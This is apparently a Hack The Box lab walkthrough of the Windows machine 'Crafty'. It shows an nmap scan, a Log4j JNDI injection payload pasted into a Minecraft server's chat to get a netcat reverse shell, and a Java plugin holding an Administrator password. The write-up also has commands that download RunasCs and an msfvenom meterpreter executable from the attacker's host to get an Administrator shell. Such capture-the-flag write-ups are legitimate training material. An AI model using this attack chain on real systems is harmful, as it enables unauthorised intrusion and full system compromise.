Crafty
Platform: Hack The Box
Category/Tags: Windows, CVE, Log4j
Difficulty: Easy
Recon
To start the lab, just connect to the VPN provided by HTB and add the machine’s IP address to /etc/hosts.
As usual, I do an nmap scan. I scan all ports to reveal some open ports other than port 80.
nmap -sC -sV -p- -oN results.nmap crafty.htb
Open ports
Port 80 - http
Port 25565 - Minecraft server with a version of 1.16.5
This is the landing page, a design inspired by Minecraft.
I did some web directory fuzzing for hidden directories, subdomain enumeration, and even searching for a Microsoft IIS 10.0 exploit, but had no luck. So I thought that play.crafty.htb was the Minecraft server where we could do some exploration.
Foothold
I have a wild guess that this is a Log4j vulnerability, and Minecraft is one of the services affected by this zero-day vulnerability.
I used TLauncher (make sure to use the exact version, 1.16.5) to join the server. I tried to send messages to other players, and it worked as usual (but the server is a bit crap). So I searched the exploit for Log4j and stumbled upon this repository log4j-shell-poc and explored how it works. Before I begin, I change the cmd value from poc.py to "cmd.”.
To setup a listener,
nc -lnvp 9001To launch the exploit,
python3 poc.py --userip <YOUR_IP> --webport 8000 --lport 9001Now, I get the ouput,
Copy the payload next to “Send me:” (this is the payload that is related to JNDI injection that can lead to RCE).
${jndi:ldap://<YOUR_IP>:1389/a}Paste this to chat,
Gotcha, we have a response,
Now, I checked my Netcat listener, and I got the shell. The user flag is on the desktop.
Privilege Escalation
This part is the most hard for me, because I’ve tried various tools to gain Administrator privileges.
In the c:\\Users\\svc_minecraft\\server\\plugins, I found the .jar file,
I can’t decompile using the jar command, so I found a way to see the bin files of Java. I came across C:\Program Files\Java\jdk1.8.0_171\bin, and I found jar.exe and javap.exe to see the contents of the jar file. So to decompile the file on the desktop,
"C:\Program Files\Java\jdk1.8.0_171\bin\jar.exe" xf c:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jarI also read all the class files using javap.exe, and I found a string “s67u84zKq8IXw” that might be helpful to gain administrator privileges.
"C:\Program Files\Java\jdk1.8.0_171\bin\javap.exe" -c c:\Users\svc_minecraft\Desktop\htb\crafty\playercounter\Playercounter.class
So I tried tools like evil-winrm, but again, no luck. So, someone gave a hint from a forum that maybe we can use RunasCs. A utility to execute commands from a high-privilege user. So I tried that, and I’ve opened an HTTP server to transfer the RunasCs.exe file to the machine.
python -m http.server 8000On the remote machine, I download the file.
curl http://<YOUR_IP>/RunasCs.exe -o runascs.exeTo check if we can login as Administrator with the string “s67u84zKq8IXw” as a password and execute commands,
runascs.exe Administrator s67u84zKq8IXw "cmd /c whoami /all"
You can now check the root flag in the Administrator/Desktop, but I want a shell that has administrator privileges. In the forum, they also gave a hint that we can use a metasploit (which, as of yet, I don’t know how to execute, but I am great at searching, so I proceed 😄).
I made a payload using Metasploit, with my listening address and port, and spit it out as an exe file.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=1234 -f exe -o exp.exeOn the remote machine, I download the file.
curl http://<YOUR_IP>/exp.exe -o exp.exeAnd I started the reverse TCP handler to establish a connection and get the shell.
On the remote machine, I run the runascs.exe to get the Administrator privilege and the exp.exe, which is our payload, to get the reverse shell as Administrator.
runascs.exe Administrator s67u84zKq8IXw "cmd /c c:\Users\svc_minecraft\Desktop\exp.exe"Here it is, I successfully get the shell.
Mitigation
Update or patch the Log4j utility to the latest version that includes the fix for the vulnerability.
Last updated